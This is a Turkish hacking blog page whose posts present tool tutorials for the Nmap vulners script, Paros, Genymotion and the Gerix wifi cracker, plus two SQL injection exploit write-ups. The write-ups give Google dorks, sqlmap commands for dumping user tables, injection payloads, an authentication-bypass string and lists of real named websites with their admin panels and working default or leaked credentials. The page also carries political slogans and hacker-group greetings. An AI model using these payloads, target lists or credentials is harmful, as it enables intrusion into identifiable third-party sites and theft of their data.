TrazeR Official Web Site

Nmap Script Vulners.nse

TrazeR 18:13:00

Selamun Aleyküm..

Açıklama

Güvenlik açıkları hakkında bilgi vermek için iyi bilinen bazı servisleri kullanan NSE komut dosyasıdir.

Bagımlılıklar :

nmap libraries:

http

json

string

Aklınızda tutmanız gereken tek şey, senaryonun elinde bulunan yazılım sürümlerine sahip olmasıdır; bu nedenle yalnızca -sV bayrağıyla çalışır.

scripti usr/share/nmap klasorundekı script dosyasına vulners.nse olarak kayıt edıyorsunuz...

Dowlonad: https://raw.githubusercontent.com/vulnersCom/nmap-vulners/master/README.md

Kullanim:

nmap -sV --script vulners <target>

Kali Linux Android Emülatör Kurulumu Genymation

Genymotion programı, Android’i Desktop cihazlara taşıyan bir emülatördür. Yani Genymotion’ı indirerek bilgisayarınızda sanal bilgisayar oluşturabilir, program içerisindeki dosyaların kurulumu gerçekleştirerek bilgisayarınızda Android işletim sistemi yüklü sanallaştırılmış mobil cihaz kullanmaya başlayabilirsiniz.

İçerisinde Android KitKat, Lollipop, Marshmallow, Nougat versiyonları ve Nexus, Samsung, Sony Xperia ve tablet modellerini barındırıyor. Android Pentest İçin ideal bir emülatör.

Genymation Dowloand

Not: Üye olmanız gerekmektedir + virtualbox'un kurulu olması lazım.

Kali Linux VirtualBox Kurulumu

Video;

Kali Linux Paros Website Vulnerability Scanner

TrazeR 16:23:00

Selamun Aleyküm...

Intro - "Paros" Proxy, web uygulamalarının güvenliğini değerlendirmek isteyen kişiler için yazılmıştır. Paros'un proxy niteliği sayesinde, çerezler ve form alanları da dahil olmak üzere, sunucu ve istemci arasındaki tüm HTTP ve HTTPS verileri engellenebilir ve değiştirilebilir.

Paros , Web Uygulaması Denetleme, test etme ve hata ayıklama için, ücretsiz Java tabanlı bir araçtır. Bu konuda, Paros'un birçok kullanımının sadece birkaçı gösterilecektir. Paros'un proxy özelliği, bir tarayıcıya gelen ve bu tarayıcıdan gelen trafiği denetlemek açısından çok değerlidir. Bu, geliştiricilerin ve denetçilerin, çerezlerin nasıl ayarlandığı, bir tarayıcıya yönlendirilen yönlendirmeler ve tarayıcıdan sunucuya gönderilen sorgular gibi web uygulama mimarilerinin çeşitli yönlerini araştırmalarını sağlar. Paros bazı otomatik tarama araçlarını içeriyor olsa da, bunlar oldukça zayıf ve Paros, neyi arayacağını bilen yetenekli bir penetrasyon test aracidir. (HTTP / HTTPS proxy. On-the-fly HTTP, XSS, SQL Enjeksiyonlari vb..)

Video:

Begenip abone olmayı unutmayın..

IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

TrazeR 13:46:00

[CODE]#################################################################################

# Exploit Title: IIS Group Admin Panel Bypass And Sql İnjection Vulnerability

# Author : TrazeR & Sipahiler & TurkZ.org

# Google Dork : intext:"Powered by IIS Group"

# Tested on : Kali Linux 2017 Chrome, Firefox

# Date : 20.12.2017

# Vendor Home: http://www.iisgroup.co.za/

# Blog : http://www.trazer.org/

# Forum : http://www.turkz.org/Forum/

# Telegram: https://t.me/turkzgrup

#################################################################################

Tutorial :

[+] Dorking İn Google Or Other Search Enggine

[+] Open Target

[+] /admin/

[+] /admin/login.asp

[+] Sql GET parameter 'cat' is vulnerable

Command:root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10 --random-agent --text-only --no-cast -u "http://www.deville.co.za/products.asp?cat=35" -T users -C id,name,pw --dump

Parameter: cat (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: cat=35 AND 8346=8346

Demo: Sql:

http://www.deville.co.za/products.asp?cat=35'===> admin dv147

http://www.adval.co.za/online.asp?controller=news&view=all&id=1'

http://www.iisgroup.co.za/admin/login.asp?error=1'

===>

http://www.mactool.co.za/admin/login.asp ===> '=''or'

http://superfloral.info/admin/login.asp ===> '=''OR'

Username: admin Password: admin

Username: '=''or' Password: '=''or'

http://absolutecars.co.za/admin/online.asp ===> admin admin

http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://www.fluidco.co.za/admin/online.asp ===> admin admin

http://www.burma.co.za/cms/index.php ===> admin admin

http://farsa.biz/admin/login.asp ===> admin admin

http://fundisa-academy.com/admin/online.asp ===> admin admin

http://efpglobal.com/admin/online.asp ===> admin admin

http://biscuitmanufacturers.co.za/admin/login.asp ===> admin admin

http://www.fluidco.co.za/admin/online.asp ===> admin admin

http://www.360businessparks.com/admin/online.asp ===> admin admin

http://www.360storagesolutions.co.za/admin/online.asp ===> admin admin

http://www.thehosevan.co.za/admin/online.asp ===> admin admin

http://viewdns.info/reverseip/?host=196.44.35.90&t=1 Choose Random Target

FREE PALESTINE & FREE GAZA ===> İSREAL TERRORIST #KUDUS İSLAMİNDİR!

Greet'Zzz : ABIKANBEY & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen

[/CODE]

Kali Linux Gerix Wifi Cracker2

TrazeR 17:49:00

Selamun Aleyküm ...

gerix-wifi-cracker-2 pythonla yazılmış bir wifi crack aracidir.

Kullanımı basit ve etkilidir.

gerix ile WEB - WPA- WPA2 şifrelerini elde edebilirsiniz.

Kurulum:

git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git

cd gerix-wifi-cracker-2

chmod +x gerix.py

python gerix.py

Video:

Bazi kendini bilmez Kişilik yoksunu Kancik' ciklar kanalima sacma sapan yorumlar ve dislike atıyorlar onların ben buradan ....

Abone Olup Beğenmeyi Unutmayin.

Credits Previcinidesign Sql Injection Vulnerability

TrazeR 15:51:00

KOD:

#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff